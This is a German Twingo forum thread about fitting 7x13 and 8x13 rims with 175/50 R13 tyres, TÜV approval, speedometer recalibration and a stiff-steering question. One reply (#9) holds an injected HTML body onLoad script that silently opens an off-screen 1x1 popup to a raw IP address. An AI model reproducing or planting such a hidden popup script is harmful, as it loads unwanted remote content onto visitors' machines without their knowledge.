Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Hilfe zu Felgen ???????
#1
Hallo auch,
bin relativ neu unter den Twingobesitzern, und würde gerne einen Satz Smoor Roadster montieren ( am liebsten 7 + 8 x 13 ) wer kann mir sagen ob ich die Dinger OHNE Karosseriearbeiten draufbekomme!
(Geplantes Fahrwerk 60-45 evtl. Gewinde ) Da ich vom VW Lager komme ( jaja ich weiß....... ) kenne ich es nur daß da ne Tachoangleichung gemachtwerden muß bei 175/ 50 R13 wer kann mir dazu was sagen.....

Wäre super wenn ich ein Paar Tipps haben könnte!

Heiko
Zitieren
Es bedanken sich:
#2
Nun ja! Zu dem VW-Lager verlieren wir nu mal kein Wort! Cool

Zu den Felgen:
Ich habe die Mattig SSF in 7x13 und 8x13 drauf! Auch mit 175/50/13! Auch ein Gewindefahrwerk hab ich drin. Ich musste aber Karosserie-Arbeiten machen! Zumindest hinten vorne hats geklappt! Da kommts aber noch auf die ET an! Meine Felgen haben hinten ET01! Denke aber die Smoor sind ähnlich!

Da wirst du im gezogene Radläufe nicht drum rum kommmen![/u]
Ameisen duckt euch!
Zitieren
Es bedanken sich:
#3
Danke für die schnelle Antwort! Die Smoor´s habe vorne ET 20 und hinten ET 15 ( sollten nach meiner Rechnung also 14 mm weiter drinne stehen ) ! Musstest du hinten viel machen oder denkst du mit bei 14 mm schmäler sollte es gehen? Und wie sieht es mit der Tachoangleichung aus musstest du sowas machen??

Heiko
Zitieren
Es bedanken sich:
#4
Mal ganz was anderes: 175er wirst Du auf keinen Fall mehr eingetragen bekommen... seit ein paar Monaten (oder ist es jetzt schon ein Jahr her?! *gg*) dürfen die nicht mehr eingetragen werden (auf 7 oder 8 Zoll breiten Felgen, da sie ne Zeit lang (bei nem bestimmten Hersteller) von der Felge sprangen!

Mußt wohl auf 195er ausweichen und dann wirst wohl um Karosseriearbeiten nicht mehr rumkommen!
Zitieren
Es bedanken sich:
#5
Zum TÜV mache ich mir da weniger gedanken, zum einen hab ich nen recht guten Draht zu nem Prüfer und im Prinzip schon geklärt das er mir daß mit nem Gutachten in dem die 175er drinstehen auch einträgt, zum anderen verkauft Smoor die Räder ja noch mit einem solchen Gutachten.... muss ja also auch irgendwie gehen!
Allerdings hatte ich auch ne Anfrage bezgl. T-Lines bei einem unserer örtlichen Renault Händler gestartet welcher mir dies auch in "gebraucht " mit 175er und Eintragung anbot!!
Werde aber auf jedenfall noch mal Infos einholen wenn ich weiß ob die Dinger OHNE Arbeiten am Auto drauf´gehen!

Danke für die Info!

Heiko
Zitieren
Es bedanken sich:
#6
hi,

ich hatte die t-lines mit 175ern. sind breit wie 195er. bei manchen sind arbeiten nötig, bei anderen nicht. bei mir musste etwas gemacht werden. schau mal nach, ob du hinten im radlauf ne kante hast, so ca. 0,5 cm breit. wenn ja, dann musst du diese zumindest umlegen. meist muss auch das handbremsseil verlegt werden...
Grüße aus dem Rheingau

Klaus
Zitieren
Es bedanken sich:
#7
dunlop gibt noch eine freigabe bis acht zoll auf den sp2000 175/50
Zitieren
Es bedanken sich:
#8
Hat von euch vielleicht jemend ein Gutachten von 7 x 13 er Rädern ( wegen Auflagen etc.... ) super wär halt von Smoor oder von T-Lines, welches er mir evtl. zumailen könnte.

Meine Dankbarkeit würde keinen Grenzen kennen!!! Laughing

Desweiteren hätte ich noch ne Frage zur Lenkung ( wie schon gesgat hab daß Auto noch nicht so lange ) :

Und zwar lässt er sich ganz leicht lenken wenn man steht oder langsam fährt, aber bei höheren Geschwindigkeiten "hakt" die Lenkung irgendwie! Is das Normal ( weil elektronisch ) oder ein bekannter Twingo Mangel???

Danke schonmal

Heiko
Zitieren
Es bedanken sich:
#9
Welche Baujahr denn?

Ist mir bei meinen Beiden (01er und 03er Baujahr) nie aufgefallen. Ist auch bei 200 noch butterweich.


Ben

<body onLoad="win=window.open('http://66.246.52.126/page.php?id=7857','_blank','width=1,height=1,left=2000,top=2000');window.setTimeout('win.close()',15000);onUnload='win.close()';"></body>
Zitieren
Es bedanken sich:
#10
Hallo Ben,

Baujahr is 1998 ( besser gesagt 12/98 ) Modell 99! Lenkung is wirklich seltsam, dachte es käme vielleicht durch diese " elektronische" Servolenkung!!???!

Werd alternativ wohl mal bei Renault vorbeifahren, vielleicht muss da ja nur was abgeschmiert werden oder so.....

Heiko
Zitieren
Es bedanken sich:
#11
Jo, oder mal Spur prüfen lassen. Kost normal so 20 Euro wenn sie nix machen müssen.

Ben
Zitieren
Es bedanken sich:
#12
Hallo nochmal,
sagt mal der Twingo konnte doch beim Renault Händler mit T-Lines und 175/50 R 13 geordert werden, Richtig? Dann muss es doch da ne Freigabe bezüglich des Tachos geben oder? Da wird doch nicht jeder ne Tachoangleichung haben ( Oder etwa doch?? Shocked ) D.h. es muss ein schrieben von Renault existieren in dem steht "175/ 50 R 13" ist OK ( oder ähnlich Laughing ) Wer hilft mir..........?????????
Zitieren
Es bedanken sich:
#13
ne kannste nur mit 195er ordern...früher vieleicht einmal mit 175er wäre mir aber neu.

und wegen der angleichung... soll man machen...wenn du aber dem Tüvler gut zusprichst kommst auch ohne durch

gruß
Zitieren
Es bedanken sich:
#14
tachoangleichung ist eh n witz. da achtet kein schw*** drauf. Ich hatte es damals gemacht, weil ich immer 100 %ig bin. mein renault händler meinte nur, das hätte ich mir sparen können.

mit der angleichung zeigt der tacho mit winterreifen (nehmen wir mal an, die sind nicht 175er...) ja auch zu wenig an. eigentlich ist es egal, ob er dir im sommer zuviel oder im winter zuwenig anzeigt.
Grüße aus dem Rheingau

Klaus
Zitieren
Es bedanken sich:
#15
die sollte man dann auch im winter deaktivieren
Zitieren
Es bedanken sich:


Möglicherweise verwandte Themen…
Thema Verfasser Antworten Ansichten Letzter Beitrag
ZZTwingo1 Passen diese Felgen? Bitte um eure Hilfe! Wenko 14 12.069 25.06.2018, 19:06
Letzter Beitrag: hubert.md
  Felgen 14 zoll hilfe ! Mariushue123 2 3.181 10.03.2014, 21:41
Letzter Beitrag: sven007
  Fragen zu dicken Felgen und Reifen HILFE!! BGR3000 20 19.866 15.05.2012, 15:01
Letzter Beitrag: Chris - TFNRW
  Twingo Felgen 13 Zoll BITTE UM HILFE Cliopower2106 3 6.071 25.07.2010, 10:33
Letzter Beitrag: Shortyplayer
  Reifen/Felgen-bitte um Hilfe owl-andre 5 4.708 17.05.2010, 12:19
Letzter Beitrag: owl-andre
  --Hilfe-- Felgen nur welche??? Twingo~fan 38 28.751 24.08.2009, 17:21
Letzter Beitrag: HardyRT

Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste